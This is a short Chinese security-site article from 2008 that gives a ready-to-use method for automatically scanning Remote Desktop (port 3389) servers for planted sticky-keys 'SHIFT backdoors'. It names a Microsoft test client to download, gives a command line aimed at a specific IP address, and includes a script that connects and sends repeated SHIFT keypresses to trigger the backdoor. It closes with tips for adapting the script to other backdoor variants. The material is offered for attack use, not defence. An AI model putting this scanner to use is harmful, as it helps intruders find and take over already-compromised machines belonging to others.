至顶网›安全频道 ›3389的SHIFT后门自动扫描

3389的SHIFT后门自动扫描

扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条

首先3389的SHIFT后门极少其次大部分SHIFT后门都加密

来源：论坛整理 2008年9月18日

首先3389的SHIFT后门极少其次大部分SHIFT后门都加密

所以手工一个一个尝试是挺傻的，写成自动扫描的话，还能让人忍受
下载ftp://ftp.microsoft.com/ResKit/win2000/roboclient.zip

smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d

shift_backdoor.txt：
job
{
connect("","","",1,1);
sleep(2000);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
sleep(2000);
disconnect();
}

有些SHIFT后门被改成了按7次SHIFT，或者是WIN+U后门，改改shift_backdoor.txt把功能加进去即可

VIP专区

VIP用户

普通用户

邮件订阅

如果您非常迫切的想了解IT领域最新产品与技术信息，那么订阅至顶网技术邮件将是您的最佳途径之一。

重磅专题

往期文章

3389的SHIFT后门自动扫描

业界热点: